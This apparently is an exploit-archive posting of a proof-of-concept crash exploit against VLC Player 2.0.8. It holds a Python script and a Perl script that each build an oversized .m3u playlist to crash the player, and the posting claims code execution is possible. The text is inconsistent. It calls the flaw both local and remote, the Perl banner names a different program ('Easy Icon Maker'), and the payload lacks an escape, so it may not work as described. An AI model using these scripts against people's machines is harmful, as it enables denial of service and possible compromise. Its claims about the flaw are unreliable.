Home / exploitsPDF  

VLC Player 2.0.8 <= Local Crash PoC

Posted on 20 August 2013

<pre># Exploit Title: VLC Player 2.0.8 &lt;= Local Crash PoC # Vendor URI: http://www.videolan.org/vlc/ # Vendor Description: # VLC is a free and open source cross-platform multimedia player # and framework that plays most multimedia files as well as DVD, # Audio CD, VCD, and various streaming protocols. # Tested on: [ Windows 7] VLC Player is prone to a remote denial-of-service vulnerability. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition. VLC Player 2.0.8 is vulnerable; other versions may also be affected. # !/usr/bin/python header=&quot;http://&quot; poc= &quot;x41&quot; * 50000 file = open(&quot;asesino04.m3u&quot;,&quot;w&quot;) file.write(header+poc) file.close() ------------------- #!/usr/bin/perl system(&quot;title The Black Devils&quot;); system(&quot;color 1e&quot;); system(&quot;cls&quot;); print &quot; &quot;; print &quot; |=======================================================| &quot;; print &quot; |= [!] Name : Easy Icon Maker Version =| &quot;; print &quot; |= [!] Exploit : Crash Exploit =| &quot;; print &quot; |= [!] Author : The Black Devils =| &quot;; print &quot; |= [!] Mail: mr.k4rizma(at)gmail(dot)com =| &quot;; print &quot; |=======================================================| &quot;; sleep(2); print &quot; &quot;; # Creating ... my $header=&quot;http://&quot; ; my $PoC = &quot;x41&quot; x 50000 ; open(file , &quot;&gt;&quot;, &quot;inj3ct0rs.m3u&quot;); print file $PoC; print &quot; [+] File successfully created! &quot; or die print &quot; [-] OupsS! File is Not Created !! &quot;; close(file); # Contact : ------------------ # Fane Page : www.facebook.com/Th3.Black.D3Vils # Youtube : www.youtube.com/user/Th3BlackDevils # Facebook : www.facebook.com/DevilsDz # Email : mr.k4rizma@gmail.com </pre>

 

TOP